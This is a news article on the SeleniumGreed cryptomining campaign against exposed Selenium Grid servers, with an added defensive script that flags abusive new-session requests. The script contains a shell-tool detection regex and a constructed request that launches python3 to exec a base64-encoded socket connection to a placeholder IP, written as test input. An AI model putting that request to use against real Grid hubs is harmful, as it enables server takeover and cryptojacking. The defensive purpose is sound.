29 July 2024

SeleniumGreed campaign exploits Selenium servers to mine cryptocurrency

A threat actor dubbed 'SeleniumGreed' is targeting publicly exposed Selenium Grid instances, abusing features of the Selenium WebDriver API to open a reverse shell and run scripts that download an XMRig miner, Wiz researchers have discovered.

SeleniumGreed exploits the Selenium WebDriver API to run commands on the underlying servers, installing cryptocurrency miners in the process. Selenium Grid does not enable authentication for this API by default, and that default has left more than 17,000 Selenium Grid servers with unprotected APIs exposed online.

“Selenium is one of the most widely used testing frameworks in the industry,” Wiz noted. “Our data shows that it is utilized in 30% of cloud environments, and the official selenium/hub Docker image has over 100 million pulls on Docker Hub. By default, authentication is not enabled for this service, leading to many publicly accessible instances being misconfigured and vulnerable.”

The threat actor uses a modified XMRig miner packed with custom UPX headers. To avoid detection and tracking, SeleniumGreed employs various stealth techniques, including leveraging workloads of other compromised Selenium nodes as command-and-control (C2) servers and mining pool proxies.

The attack begins with the adversary sending a request to a vulnerable Selenium Grid hub that makes it execute a Python program containing a Base64-encoded payload. That payload spawns a reverse shell to an attacker-controlled server and then fetches the final payload, a modified XMRig miner. Notably, the server's IP address belongs to a legitimate service that has itself been compromised and hosts a publicly exposed Selenium Grid instance.
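A practical check for defenders who run a Grid: inspect the new-session requests the hub receives for the abuse pattern described above, namely a request that asks the node to launch an interpreter instead of a browser and passes it an encoded payload as arguments. The script below is an added example written for this article, not code from Wiz or from the Selenium project. It assumes the vector the Wiz writeup describes (the browser-options `binary` path and `args` in the WebDriver capabilities being pointed at Python), and the list of expected browser paths, the token regex and the two request bodies are constructed for illustration.

```python
"""Added example (not Wiz's or Selenium's code): triage of Selenium Grid
new-session request bodies for browser-binary / argument abuse."""
import base64
import json
import re

# Assumption: the browser executables your Selenium node images actually launch.
EXPECTED_BINARIES = {
    "/usr/bin/google-chrome",
    "/opt/google/chrome/chrome",
    "/usr/bin/chromium",
    "/usr/bin/firefox",
}

# Tokens that have no business in a browser command line or in a decoded argument
# (assumption: tune to your environment).
SHELL_TOKENS = re.compile(
    r"(/bin/(?:ba)?sh|python\d?(?:\s|$)|\bsubprocess\b|\bsocket\b|\bexec\b"
    r"|\bcurl\b|\bwget\b|\bxmrig\b|\bnc\b)",
    re.IGNORECASE,
)
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def iter_capabilities(req: dict):
    """Yield each capability object from a W3C new-session body
    (capabilities.alwaysMatch / capabilities.firstMatch) and from the legacy
    desiredCapabilities field, so nothing hides in an alternate slot."""
    caps = req.get("capabilities") or {}
    if isinstance(caps.get("alwaysMatch"), dict):
        yield caps["alwaysMatch"]
    for fm in caps.get("firstMatch") or []:
        if isinstance(fm, dict):
            yield fm
    if isinstance(req.get("desiredCapabilities"), dict):
        yield req["desiredCapabilities"]


def decoded_blobs(text: str):
    """Yield UTF-8 decodings of base64-looking runs found inside an argument."""
    for blob in B64_BLOB.findall(text):
        try:
            yield base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue


def inspect_new_session(body: str) -> list:
    """Return findings for a POST /session (or /wd/hub/session) JSON body.
    An empty list means no binary override or suspicious argument was seen."""
    findings = []
    req = json.loads(body)
    for cap in iter_capabilities(req):
        for key in ("goog:chromeOptions", "ms:edgeOptions", "moz:firefoxOptions"):
            opts = cap.get(key)
            if not isinstance(opts, dict):
                continue
            binary = opts.get("binary")
            if binary and binary not in EXPECTED_BINARIES:
                findings.append(f"{key}.binary points at non-browser executable: {binary}")
            for arg in opts.get("args") or []:
                if SHELL_TOKENS.search(arg):
                    findings.append(f"{key}.args carries shell/interpreter token: {arg[:60]}")
                for plain in decoded_blobs(arg):
                    if SHELL_TOKENS.search(plain):
                        findings.append(f"{key}.args carries base64-encoded payload: {plain[:60]}")
    return findings


# Constructed sample bodies. The "reverse shell" below is a stand-in string that
# is only ever decoded and pattern-matched, never executed; the IP is TEST-NET.
REVERSE_SHELL_STUB = "import socket;socket.create_connection(('198.51.100.7', 4444))"
MALICIOUS_REQUEST = json.dumps({
    "capabilities": {"alwaysMatch": {
        "browserName": "chrome",
        "goog:chromeOptions": {
            "binary": "/usr/bin/python3",
            "args": ["-c", "import base64;exec(base64.b64decode('"
                           + base64.b64encode(REVERSE_SHELL_STUB.encode()).decode() + "'))"],
        },
    }},
})
BENIGN_REQUEST = json.dumps({
    "capabilities": {"alwaysMatch": {
        "browserName": "chrome",
        "goog:chromeOptions": {"args": ["--headless=new", "--no-sandbox", "--window-size=1920,1080"]},
    }},
})

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_REQUEST), ("malicious", MALICIOUS_REQUEST)):
        print(label, inspect_new_session(body) or "clean")
```

Feed it request bodies captured at a reverse proxy or from hub request logging; a hit on the `binary` check alone is enough to treat the session as hostile, since no legitimate test needs the node to launch something other than a browser. The check is a detective control only: the fix for the underlying problem is to keep the hub off the public internet and require authentication in front of it.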

The researchers said the threat actor has been active for over a year and that the observed campaign is still ongoing.
